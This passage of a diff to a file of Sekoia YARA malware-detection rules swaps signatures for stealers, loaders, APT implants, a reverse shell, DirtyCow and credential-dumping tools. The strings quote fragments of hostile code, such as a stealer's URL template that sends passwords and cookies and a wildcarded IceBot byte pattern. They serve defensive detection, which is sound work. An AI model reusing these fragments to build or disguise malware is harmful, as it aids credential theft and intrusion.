+		$str03 = "__  _____| |__   ___   ___ | | __" wide
+		$str04 = "\\ \\/ / _ \\ '_ \\ / _ \\ / _ \\| |/ /" wide
+		$str05 = " >  <  __/ | | | (_) | (_) |   <" wide
+		$str06 = "/_/\\_\\___|_| |_|\\___/ \\___/|_|\\_\\" wide
+		$str07 = "https://t.me/xehook" wide
+		$str08 = "About PC.txt" wide
+		$str09 = "Browser: {4} v{5} ({6})" wide
+		$str10 = "http://ip-api.com/json/?fields=11827" wide
+		$str11 = "{0}gate.php?id={1}&build={2}&passwords={3}&cookies={4}" wide
+		$str12 = "getjson.php?id=" wide
+		$com01 = "CheckRemoteDebuggerPresent" ascii
+		$com02 = "get_CurrentThread" ascii
+		$com03 = "get_InstalledInputLanguages" ascii
+		$com04 = "get_Ticks" ascii
+		$com05 = "System.Security.Cryptography" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 5 of them
+		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and 4 of ( $com* )
 }
-rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
+rule SEKOIA_Apt_Badmagic_Commonmagic_Usbstealer : FILE
 {
 	meta:
-		description = "Finds Amadey's clipper plugin based on characteristic strings"
+		description = "Detects CommonMagic related implants"
 		author = "Sekoia.io"
-		id = "487b6657-8834-45ee-8fd4-03df9c0dd7be"
-		date = "2023-05-16"
+		id = "37d5becc-f1c3-4400-bc10-cd6036d4dbb1"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_amadey_clipper_plugin.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_commonmagic_usbstealer.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "6f5a2fa9c687f0fb2423ca97540d0173551dd04b31d092e4d47d6d7d22dfb965"
+		logic_hash = "a600f17bce9159b581c234cc101d1a0d093954fc9c79052dbca5451714fd7502"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249161,29 +249196,26 @@ rule SEKOIA_Loader_Amadey_Clipper_Plugin : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "CLIPPERDLL.dll" ascii
-		$str02 = "??4CClipperDLL@@QAEAAV0@$$QAV0@@Z" ascii
-		$str03 = "??4CClipperDLL@@QAEAAV0@ABV0@@Z" ascii
-		$str04 = "Main" ascii fullword
-		$str05 = "OpenClipboard" ascii
-		$str06 = "GetClipboardData" ascii
-		$str07 = "D:\\Mktmp\\Amadey\\ClipperDLL\\Release\\CLIPPERDLL.pdb" ascii
+		$ = "\\\\.\\pipe\\PipeDtMd" ascii wide fullword
+		$ = "State USB" ascii wide
+		$ = "DefaultNameDevice" ascii wide
+		$ = "SerialNumber" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 5 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_7 : FILE
 {
 	meta:
-		description = "Detect the Squirrelwaffle DLL"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "bea3125e-6e84-435f-855b-fd3239a0deac"
-		date = "2021-09-20"
+		id = "de8069bb-59d7-4753-974a-f77c4b9e9bae"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/loader_win_squirrelwaffle.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_7.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "ab1a95f09564d0417d5c06c578d4dc8d790ec09bc67716d8c9e5207262a0594d"
+		logic_hash = "27b5f3d24f7269e80b628be044d828d365fdba25891a5a1ecc973c419cf1dc6c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249191,47 +249223,26 @@ rule SEKOIA_Loader_Win_Squirrelwaffle : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "AEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" ascii
-		$s2 = "c:\\equal\\True\\bird_Select\\780\\true.pdb" ascii
-
-	condition:
-		uint16( 0 ) == 0x5A4D and all of them
-}
-
-rule SEKOIA_Ransomware_Win_Eking_Rich_Header
-{
-	meta:
-		description = "Detect Eking ransomware using its rich header"
-		author = "Sekoia.io"
-		id = "9fe76f89-f27a-4a47-a61c-2d767a1a8acb"
-		date = "2021-10-07"
-		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_eking_rich_header.yar#L4-L15"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0028200fc2e929dba6fcc4ddf5d8e07825842e2f65c69ad94ebd032ae3748c90"
-		score = 75
-		quality = 80
-		tags = ""
-		version = "1.0"
-		classification = "TLP:CLEAR"
+		$ = "ms.Write(ba, 0, (length / 4) * 3)"
+		$ = "var serialized_obj = "
+		$ = "var n = fmt.SurrogateSelector;"
+		$ = "var o = d.DynamicInvoke(al.ToArray())"
 
 	condition:
-		hash.md5( pe.rich_signature.clear_data ) == "256b60751602028612562b73ecdb163c"
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Unk_Quad7_Netd_Strings : FILE
+rule SEKOIA_Apt_Toddycat_Toddybox_Strings : FILE
 {
 	meta:
-		description = "Matches netd binary"
+		description = "Detects ToddyCat's ToddyBox binary"
 		author = "Sekoia.io"
-		id = "3f527f0e-c101-4356-9024-fc61aea644d1"
-		date = "2024-08-23"
+		id = "fde3df24-ebd7-4327-998e-bddaa08835da"
+		date = "2023-11-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_netd_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_toddycat_toddybox_strings.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "cdb37db4543dde5ca2bd98a43699828f"
-		logic_hash = "abd59c5fa0c4c73a2cd9a2263d5573d896c6c0d71d96bd59167b1e2d7fbf108e"
+		logic_hash = "b71fad12d4485268cbeff98b8a8d6067ac8f62164be60cdb61f3f37ab471a247"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249239,57 +249250,56 @@ rule SEKOIA_Unk_Quad7_Netd_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "./netd.dat"
-		$ = "./sys.dat"
-		$ = "--conf"
-		$ = "--init"
-		$ = "--nobg"
-		$ = "Url is NULL."
+		$ = "Wait a while to upload the next file..."
+		$ = "[-] Error Msg: %s"
+		$ = "[-] Error Msg: Connect Errors or Proxy Errors"
+		$ = "[-] arg missing!"
+		$ = "[-] Get module dir failed!"
+		$ = "[-] Dir error!"
+		$ = "Auto Get Proxy %S"
+		$ = "Dropbox-API-Arg"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and 4 of them
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
-
-rule SEKOIA_Icebot_Exported_Function : FILE
+rule SEKOIA_Crime_Sload_Zip_Archives : FILE
 {
 	meta:
-		description = "Detects the IceBot RAT used by FIN7 based on the exported function"
+		description = "Detects ZIP archives used by sLOad"
 		author = "Sekoia.io"
-		id = "1a1fb651-6ce3-4751-be23-c27a3d8dabde"
-		date = "2022-01-17"
+		id = "5335ad65-bca5-4937-8634-46cbd7aa1b0e"
+		date = "2022-08-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/icebot_exported_function.yar#L4-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_zip_archives.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "c029693f555726d28375717fe459ccf4521d2d63fc7053032bbafd60129848f0"
+		logic_hash = "f2bc6464de008f2ce40acabd87ebbd91659d317f57e223118937ba51f70d0f7f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "5ee5b869689686d9352c73173304627bb424b8d0a8510e6f16726ac84fdec79d"
-		hash2 = "0f76768f65775329d7a0ddb977ea822d992d086ce48a23679cef66e3b4d2f4ed"
-		hash3 = "f06c7f1b91fb2f64e1f38df6eaf2b52a74b16cc958d74c4401fdaf180deb595a"
-		hash4 = "cbed0cf3273ce544a7e4e316d5c8f5e9c9ac6deaefa485a6afad2654fe75ff1e"
 
 	strings:
-		$a = {cc cc cc 48 89 4c 24 ?? 53 55 56 57 41 54 41 55 41 56 41 57 ?? ?? ?? ?? 33 f6 44 8b ee 48 89 74 24 ?? 8b ee 48 89 b4 24 ?? ?? ?? ?? 44 8b f6 48 89 74 24 ?? 44 8b e6 e8 bf ff ff ff 4c 8b f8 8d 5e ?? b8 ?? ?? ?? ?? 66 41 39 07 75 1b 49 63 57 ?? 48 8d 4a ?? 48 81 f9 ?? ?? ?? ?? 77 0a 42 81 3c 3a ?? ?? ?? ?? 74 05 4c 2b fb eb d5 65 48 8b 04 25 ?? ?? ?? ?? bf ?? ?? ?? ?? 4c 89 bc 24 ?? ?? ?? ?? 48 8b 48 ?? 4c 8b 59 ?? 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 84 d5 01 00 00 41 b9 ff ff 00 00 49 8b 53 ?? 48 8b c6 45 0f b7 43 ?? 0f b6 0a c1 c8 ?? 80 f9 ?? 72 04 48 83 c0 ?? 48 03 c1 48 03 d3 66 45 03 c1 75 e5 3d ?? ?? ?? ?? 0f 85 d2 00 00 00 49 8b 53 ?? 41 bb ff ff 00 00 48 63 42 ?? 8b b4 10 ?? ?? ?? ?? 44 8b 54 16 ?? 8b 5c 16 ?? 4c 03 d2 48 03 da 45 33 c9 45 8d 79 ?? 45 8b 02 41 8b c9 4c 03 c2 41 8a 00 4d 03 c7 c1 c9 ?? 0f be c0 03 c8 41 8a 00 84 c0 75 ee 81 f9 ?? ?? ?? ?? 74 10 81 f9 ?? ?? ?? ?? 74 08 81 f9 ?? ?? ?? ?? 75 44 44 8b 4c 16 ?? 44 0f b7 03 4c 03 ca 81 f9 ?? ?? ?? ?? 75 09 47 8b 2c 81 4c 03 ea eb 20 81 f9 ?? ?? ?? ?? 75 09 43 8b 2c 81 48 03 ea eb 0f 81 f9 ?? ?? ?? ?? 75 07 47 8b 34 81 4c 03 f2 66 41 03 fb 45 33 c9 49 83 c2 ?? 48 83 c3 ?? 66 85 ff 0f 85 75 ff ff ff 4c 8b 9c 24 ?? ?? ?? ?? 33 f6 48 89 ac 24 ?? ?? ?? ?? 4c 89 6c 24 ?? e9 8d 00 00 00 3d ?? ?? ?? ?? 0f 85 90 00 00 00 4d 8b 43 ?? 41 bf ?? ?? ?? ?? 41 0f b7 ff bd ff ff 00 00 49 63 40 ?? 42 8b 9c 00 ?? ?? ?? ?? 46 8b 4c 03 ?? 46 8b 54 03 ?? 4d 03 c8 4d 03 d0 41 8b 11 8b ce 49 03 d0 8a 02 49 03 d7 c1 c9 ?? 0f be c0 03 c8 8a 02 84 c0 75 ef 81 f9 ?? ?? ?? ?? 75 16 42 8b 4c 03 ?? 41 0f b7 12 49 03 c8 44 8b 24 91 4d 03 e0 66 03 fd 49 83 c1 ?? 49 83 c2 ?? 66 85 ff 75 ba 48 8b ac 24 ?? ?? ?? ?? 4c 89 64 24 ?? 41 b9 ff ff 00 00 bf ?? ?? ?? ?? 49 8b df 4d 85 ed 74 0f 48 85 ed 74 0a 4d 85 f6 74 05 4d 85 e4 75 14 4d 8b 1b 4c 89 9c 24 ?? ?? ?? ?? 4d 85 db 0f 85 39 fe ff ff 4c 8b bc 24 ?? ?? ?? ?? 49 63 6f ?? 33 c9 49 03 ef 89 b4 24 ?? ?? ?? ?? 41 b8 00 ?? ?? ?? 48 89 6c 24 ?? 4c 8b e6 44 8d 49 ?? 8b 55 ?? 41 ff d6 44 0f b7 45 ?? 48 8b f8 44 0f b7 55 ?? 49 83 c0 ?? 4d 85 d2 74 4f 4c 03 c5 41 8b 00 4c 2b d3 45 8b 48 ?? 41 8b 48 ?? 48 03 cf 49 8d 14 07 41 03 c1 89 84 24 ?? ?? ?? ?? 48 8b c1 48 2b c2 4d 85 e4 49 0f 45 c4 4c 8b e0 4d 85 c9 74 0f 8a 02 48 03 d3 88 01 48 03 cb 4c 2b cb 75 f1 49 83 c0 ?? 4d 85 d2 75 b4 8b 85 ?? ?? ?? ?? 41 be ?? ?? ?? ?? 85 c0 0f 84 e8 00 00 00 48 8d 1c 07 8b 43 ?? 85 c0 0f 84 d9 00 00 00 48 8b ac 24 ?? ?? ?? ?? 8b c8 48 03 cf 41 ff d5 44 8b 7b ?? 33 c9 8b 33 4c 03 ff 48 03 f7 4c 8b e8 49 39 0f 74 7d 48 85 f6 74 31 48 39 0e 7d 2c 49 63 45 ?? 0f b7 16 42 8b 8c 28 ?? ?? ?? ?? 42 8b 44 29 ?? 42 8b 4c 29 ?? 48 2b d0 49 03 cd 8b 04 91 49 03 c5 49 89 07 33 c9 eb 2a 4d 8b 37 49 8b cd 49 83 c6 ?? 4c 03 f7 49 8b d6 ff d5 33 c9 49 89 07 41 38 0e 74 0e 8d 41 ?? 41 88 0e 4c 03 f0 41 38 0e 75 f5 49 83 c7 ?? 48 8d 46 ?? 48 85 f6 48 0f 44 c6 48 8b f0 49 39 0f 75 89 41 be ?? ?? ?? ?? 8b 43 ?? 48 03 c7 33 f6 eb 06 40 88 30 49 03 c6 40 38 30 75 f5 8b 43 ?? 48 83 c3 ?? 4c 8b 6c 24 ?? 85 c0 0f 85 3c ff ff ff 48 8b 6c 24 ?? 4c 8b bc 24 ?? ?? ?? ?? 4c 8b cf 4c 2b 4d ?? 39 b5 ?? ?? ?? ?? 0f 84 b5 00 00 00 8b 95 ?? ?? ?? ?? 48 03 d7 8b 42 ?? 85 c0 0f 84 a1 00 00 00 41 bf ?? ?? ?? ?? bb ff ?? ?? ?? 45 8d 6f ?? 44 8b 02 4c 8d 5a ?? 44 8b d0 4c 03 c7 49 83 ea ?? 49 d1 ea 74 62 41 be ?? ?? ?? ?? 41 0f b7 0b 4d 2b d6 0f b7 c1 66 c1 e8 ?? 66 83 f8 ?? 75 09 48 23 cb 4e 01 0c 01 eb 34 66 41 3b c5 75 09 48 23 cb 46 01 0c 01 eb 25 66 41 3b c6 75 11 48 23 cb 49 8b c1 48 c1 e8 ?? 66 42 01 04 01 eb 0e 66 41 3b c7 75 08 48 23 cb 66 46 01 0c 01 4d 03 df 4d 85 d2 75 a7 8b 42 ?? 48 03 d0 8b 42 ?? 85 c0 0f 85 7a ff ff ff 4c 8b bc 24 ?? ?? ?? ?? 44 8d 70 ?? 8b 5d ?? 45 33 c0 33 d2 48 83 c9 ff 48 03 df ff 54 24 ?? e8 21 fb ff ff 4d 85 e4 74 13 48 85 c0 74 0e 4a 8d 0c 20 4c 8b e6 e8 67 00 00 00 eb 3b 8b 94 24 ?? ?? ?? ?? c1 ea ?? 89 b4 24 ?? ?? ?? ?? eb 1d 48 63 84 24 ?? ?? ?? ?? 41 89 34 87 8b 84 24 ?? ?? ?? ?? 41 03 c6 89 84 24 ?? ?? ?? ?? 8b 84 24 ?? ?? ?? ?? 3b c2 72 d8 4c 8b 84 24 ?? ?? ?? ?? ba ?? ?? ?? ?? 48 8b cf ff d3 49 8d 04 3c ?? ?? ?? ?? 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3}
+		$pic = { 00 00 00 [6] 2E ( 70 6E 67 | 67 69 66 | 6a 70 67 | 6A 70 65 67 ) }
+		$pdf = { 00 00 00 [8] 2E 70 64 66 }
+		$vbs = { ( 4c 65 67 67 69 6d 69 | 66 69 73 63 ) 2e ( 77 73 66 | 76 62 73 ) }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $a or pe.imphash ( ) == "37af5cd8fc35f39f0815827f7b80b304" or hash.md5 ( pe.rich_signature.clear_data ) == "b857cf76a54ce175c225eaaae66547a2"
+		uint16be( 0 ) == 0x504B and filesize < 30KB and all of them
 }
-rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
+rule SEKOIA_Exploit_Linux_Eop_Dirtyc0W_Strings : FILE
 {
 	meta:
-		description = "Detects payload created by SharpShooter"
+		description = "Detects DirtyCow exploit"
 		author = "Sekoia.io"
-		id = "703d2eb2-c9fd-4891-ba95-f94a8313618e"
-		date = "2023-02-03"
+		id = "f0551e56-b08f-4f6f-81df-f30fbb8ee7b8"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/generic_sharpshooter_payload_11.yar#L1-L18"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/exploit_linux_eop_dirtyc0w_strings.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "00c0dcc244db608d3a0d7500cdebadcc69ba0d56091a0a1fd7d58c27d255861f"
+		logic_hash = "70f0dda642e7892e35c1afabb4fa6a9fe62ad82d5aa2d90787e83809bc6f5859"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249297,52 +249307,54 @@ rule SEKOIA_Generic_Sharpshooter_Payload_11 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "decodeHex = EL.NodeTypedValue"
-		$ = "Private Function decodeHex(hex)"
-		$ = "serialized_obj = serialized_obj & "
-		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class)"
+		$ = "DirtyCow root privilege escalation"
+		$ = "Backing up %s to /tmp/bak"
+		$ = "(o o)_____/"
 
 	condition:
-		all of them and filesize < 2MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Crime_Sload_Scheduledtask_Dropper_Strings
+rule SEKOIA_Tool_Koblas_Server_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Koblas server"
 		author = "Sekoia.io"
-		id = "01c51da8-71a5-449f-a609-933c37bc2e63"
-		date = "2022-08-02"
+		id = "ebd891da-69dd-474c-9e08-63d0b4cc654e"
+		date = "2024-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/crime_sload_scheduledtask_dropper_strings.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_koblas_server_strings.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "3a48009933d1de47314ec15c262375636574a7565016eab3792106fa2c0ba79f"
+		logic_hash = "590f3f71564c347be7b3b2a583606c3854744d0023cde464374cd7b61ec5a2d7"
 		score = 75
-		quality = 78
-		tags = ""
+		quality = 80
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$hh='hi'+'dd'+'en';"
-		$ = { 7D 65 6C 73 65 7B 0A 24 72 73 3D 30 3B 0A 7D 0A }
-		$ = { 6B 69 6C 6C 20 2D 6E 61 6D 65 20 2A 77 65 72 73 68 65 6C 2A }
+		$ = "sent {sent} bytes and received {received} bytes" wide ascii
+		$ = "connection denied" ascii
+		$ = "loaded {} users" ascii
+		$ = "listening on {}:{} for incoming connections" ascii
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
 }
-rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
+rule SEKOIA_Unk_Quad7_Updtae_Reverse_Shell_Strings : FILE
 {
 	meta:
-		description = "Detects BadMagic StartNgrok powershell script"
+		description = "Reverse shell used by Quad7 operators"
 		author = "Sekoia.io"
-		id = "94d64482-3033-4531-8530-58546364ac06"
-		date = "2023-05-15"
+		id = "02d5394e-734c-4744-b293-1bf96bf1518c"
+		date = "2024-08-19"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_badmagic_startngrok_pshscript.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/unk_quad7_updtae_reverse_shell_strings.yar#L1-L25"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "f15f9dc2c35f3f7cd816aa539c03b857254c3628c9b14eacca1110bb85b1a24c"
+		hash = "40b5ac87ff87634c48fdd2cf64ccb66b"
+		hash = "4b8e97260d9ef6ca774675be682d9c8c"
+		logic_hash = "0e816716d4d7fd35617b1ac96ae99d68d5b96f64f8bef83d0f6aba2a3fbd9326"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249350,27 +249362,33 @@ rule SEKOIA_Apt_Badmagic_Startngrok_Pshscript : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$ExecutablePath http \"\"file:///$Disk"
-		$ = "write \"$ExecutablePath not found"
-		$ = "$ng_proxy_string ="
-		$ = "$ng_auth_token ="
-		$ = "$env:ALLUSERSPROFILE\\$NGrokFolderName"
+		$ = "User-Agent: IOT"
+		$ = "/iot/post"
+		$ = "vender"
+		$ = "Response:  %s"
+		$ = "cmdNum"
+		$ = "UPDTAE"
+		$ = "cmdResult"
 
 	condition:
-		all of them and filesize < 1KB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 5MB and 4 of them
 }
-rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
+rule SEKOIA_Apt_Apt29_Malicious_Rdp_File : FILE
 {
 	meta:
-		description = "Finds PennyWise samples based on strings"
+		description = "Detects malicious RDP files"
 		author = "Sekoia.io"
-		id = "9852b7e7-dfff-44e6-9068-d287cc84b069"
-		date = "2023-03-22"
+		id = "a7b092b5-53a1-4638-a6c1-733d3f063139"
+		date = "2024-10-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/infostealer_win_pennywise_mar23.yar#L1-L26"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_apt29_malicious_rdp_file.yar#L1-L26"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "55d7d6894de23af38230eaaff0a38c31d11d3df34aacd21fd93393d266c9357c"
+		hash = "db326d934e386059cc56c4e61695128e"
+		hash = "b38e7e8bba44bc5619b2689024ad9fca"
+		hash = "f58cf55b944f5942f1d120d95140b800"
+		hash = "40f957b756096fa6b80f95334ba92034"
+		logic_hash = "da9d8dfbbf82f48c8b880cbde21f75ecd1e9f779e462da5ced32b6587c71eaf2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249378,58 +249396,57 @@ rule SEKOIA_Infostealer_Win_Pennywise_Mar23 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chr01 = "MvgmsudRT3loHygSj1F9K" ascii
-		$chr02 = "WebInfidelity2023" ascii
-		$chr03 = "PennyWise" ascii
-		$str01 = "get_Handle" ascii
-		$str02 = "get_Now" ascii
-		$str03 = "get_Ticks" ascii
-		$str04 = "set_Expect100Continue" ascii
-		$str05 = "get_Jpeg" ascii
-		$str06 = "set_UseShellExecute" ascii
-		$str07 = "get_ProcessName" ascii
-		$str08 = "get_UtcNow" ascii
+		$ = "RedirectPrinters" wide
+		$ = "RedirectCOMPorts" wide
+		$ = "RedirectSmartCards" wide
+		$ = "RedirectPOSDevices" wide
+		$ = "RedirectClipboard" wide
+		$ = "DrivesToRedirect" wide
+		$ = "full address:s:" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 1 of ( $chr* ) and 5 of ( $str* )
+		uint16be( 0 ) == 0xFFFE and all of them and filesize < 20KB
 }
-rule SEKOIA_Latrodectus_Br4_Js_Dropper
+rule SEKOIA_Apt_Cloudatlas_Powershower_Clean : FILE
 {
 	meta:
-		description = "Detect the JS script used to drop Latrodectus"
+		description = "Detects clean version of PowerShower"
 		author = "Sekoia.io"
-		id = "042a598d-66fa-4994-a793-228355abd5dd"
-		date = "2024-06-25"
+		id = "4a7c37df-3f53-4190-a86f-94bba3df628e"
+		date = "2022-12-05"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/latrodectus_br4_js_dropper.yar#L1-L16"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_cloudatlas_powershower_clean.yar#L1-L19"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "a835bd9a9ad68fd2f285ec5c04a5c78ba5ca85381ff30048ac375bef220fd72f"
+		logic_hash = "24ea6ec0cd8dbcebdf7e42dbd48319562d8682fefd5d0d464a3a5c4b90be40f3"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = " installer.InstallProduct(msiPath);" ascii
-		$s2 = "new ActiveXObject(\"WindowsInstaller.Installer\");" ascii
+		$ = "[io.file]::WriteAllBytes($zipfile" ascii wide
+		$ = "System.IO.File]::Exists($p_t" ascii wide
+		$ = "HttpRequestP" ascii wide
+		$ = "$http_request.getOption(2)" ascii wide
+		$ = "HttpRequestP($url)" ascii wide
 
 	condition:
-		all of them
+		uint8( 0 ) == 0x24 and filesize < 4000 and 4 of them
 }
-rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
+rule SEKOIA_Hacktool_Ntdsdumpex_Strings : FILE
 {
 	meta:
-		description = "Detects Agent Racoon used by CL-STA-0002"
+		description = "Detects NTDSDumpEx based on strings"
 		author = "Sekoia.io"
-		id = "ec89f1db-0ba8-48c8-8c1a-c38c410f3e39"
-		date = "2023-12-05"
+		id = "9a0fe20a-49e9-4aaf-8f0e-d51800e0a6e0"
+		date = "2022-02-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_agent_racoon_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_ntdsdumpex_strings.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "4e32606edffab0907e343ab2fef8642c0064d83c2933531619f9dee8957d2fe4"
+		logic_hash = "3295816133ca00aeaf3f4967135ed045ed64d20393f482eafbe4e74f0f63aa47"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -249437,59 +249454,51 @@ rule SEKOIA_Apt_Agent_Racoon_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Command failed:" wide
-		$ = "Not uploaded:" wide
-		$ = "Not downloaded:" wide
-		$ = "xn--cc" wide
-		$ = "xn--ac" wide
-		$ = "xn--bc" wide
-		$ = "cmd.exe" wide
-		$ = ".xn--" wide
+		$ = "Example : ntdsdumpex.exe -r" ascii wide
+		$ = "[x]can not open output file %s for write." ascii wide
+		$ = "[+]dump completed in %.3f seconds." ascii wide
+		$ = "[+]total %d entries dumped,%d" ascii wide
+		$ = "[x]can not get PEK!" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and 3 of them
 }
